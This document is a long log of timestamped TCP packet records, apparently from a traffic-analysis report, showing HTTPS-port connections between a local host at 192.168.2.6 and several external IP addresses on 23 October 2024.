                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.417628050 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.417649984 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.417663097 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.418265104 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.418348074 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.418355942 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.418813944 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.418896914 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.418915033 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.419540882 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.419622898 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.419630051 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.419675112 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.421336889 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.459019899 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.459037066 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.459090948 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.459100008 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.459234953 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494291067 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494491100 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494587898 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494594097 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494613886 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494749069 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494806051 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494812965 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494858027 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.494863987 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.495004892 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.495059013 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.497772932 CEST4434982513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.497936964 CEST4434982513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.498013973 CEST49825443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.499481916 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.501733065 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.501739979 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.504273891 CEST4434982313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.504429102 CEST4434982313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.504473925 CEST49823443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.504903078 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.504955053 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.511884928 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.511949062 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.512270927 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.512280941 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.536511898 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.536617994 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.536631107 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.536662102 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.536699057 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.536699057 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.537364006 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.537451982 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.557631016 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.565305948 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.565350056 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.565392971 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.565407991 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.565423012 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.565454960 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.578316927 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.578392982 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.619878054 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.619904995 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.619961977 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.619971037 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.620035887 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.633963108 CEST49824443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.633975029 CEST44349824141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.641983986 CEST49834443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.642023087 CEST44349834141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.642607927 CEST49834443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.642607927 CEST49834443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.642647982 CEST44349834141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.643982887 CEST49825443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.643982887 CEST49825443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.644028902 CEST4434982513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.644058943 CEST4434982513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.645047903 CEST49823443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.645047903 CEST49823443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.645056009 CEST4434982313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.645064116 CEST4434982313.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.652606964 CEST49835443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.652669907 CEST4434983513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.653006077 CEST49835443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.654557943 CEST49836443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.654592991 CEST4434983613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.654679060 CEST49836443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655005932 CEST49835443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655025959 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655056953 CEST4434983513.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655098915 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655162096 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655208111 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655333042 CEST49836443192.168.2.613.107.253.72
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655375957 CEST4434983613.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655831099 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655930042 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655963898 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.655971050 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.656008959 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.677938938 CEST49837443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.677961111 CEST44349837141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.678404093 CEST49837443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.678543091 CEST49837443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.678553104 CEST44349837141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.689136982 CEST49838443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.689160109 CEST44349838141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.689227104 CEST49838443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.689421892 CEST49838443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.689436913 CEST44349838141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.695100069 CEST49839443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.695132017 CEST44349839141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.695317030 CEST49839443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.695501089 CEST49839443192.168.2.6141.193.213.11
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.695514917 CEST44349839141.193.213.11192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.696777105 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.696800947 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.696854115 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.696863890 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.696892023 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.696907997 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.708142996 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.741511106 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.741533995 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.741590977 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.741600037 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.741667986 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.764084101 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.764146090 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.764204979 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.764208078 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.764230967 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.764281034 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.773658991 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.773685932 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.773768902 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.773794889 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.773868084 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.773875952 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.773921013 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.774499893 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.774560928 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.774585009 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.774746895 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.783082962 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.783327103 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.783355951 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.784348011 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.784622908 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.784702063 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.784806013 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.810324907 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.810796976 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.810815096 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.812510014 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.812963963 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.813103914 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.813110113 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.813148975 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.816032887 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.816114902 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.831334114 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.857311964 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.857366085 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.857402086 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.857419968 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.857438087 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.857491970 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.864135027 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.884999990 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.885061026 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.885086060 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.885103941 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.885124922 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.885143995 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.885160923 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.889070034 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.889102936 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.889147997 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.889164925 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.889189959 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.889224052 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.889245033 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.892080069 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.892169952 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.892605066 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.892949104 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.893104076 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.893168926 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.930252075 CEST44349832141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.930516005 CEST49832443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.930529118 CEST44349832141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.931016922 CEST44349832141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.931287050 CEST49832443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.931402922 CEST44349832141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.931520939 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.931598902 CEST49832443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.934300900 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.934353113 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.942594051 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.942732096 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.942831993 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.942862034 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.942933083 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.943018913 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.943018913 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.943047047 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.943110943 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.943129063 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.943279028 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.943346024 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.943366051 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.947870016 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.947925091 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.947942972 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.960942030 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961077929 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961165905 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961199999 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961221933 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961275101 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961282969 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961386919 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961474895 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961482048 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961503029 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961548090 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.961591005 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.966418982 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.967856884 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.967864990 CEST44349829141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.976120949 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.976177931 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.976205111 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.976217985 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.976249933 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.976260900 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.979367971 CEST44349832141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.983469009 CEST49832443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:09.999382973 CEST49828443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.008042097 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.008097887 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.008121014 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.008135080 CEST44349826169.150.247.37192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.008148909 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.008173943 CEST49826443192.168.2.6169.150.247.37
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.010787964 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.010941029 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.010950089 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.010977983 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.010999918 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.011028051 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.011779070 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.011837006 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.012331009 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.012422085 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.012938023 CEST49829443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.040179968 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.040250063 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.040251017 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.040261984 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.040313005 CEST49806443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.040329933 CEST44349806141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.045870066 CEST4434983013.107.253.72192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.053136110 CEST44349817141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.053215027 CEST49817443192.168.2.6141.193.213.10
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.061897039 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.062107086 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.062192917 CEST44349828141.193.213.10192.168.2.6
                                                                                                                                                                                                                              Oct 23, 2024 20:04:10.062251091 CEST49828443192.168.2.6141.193.213.10
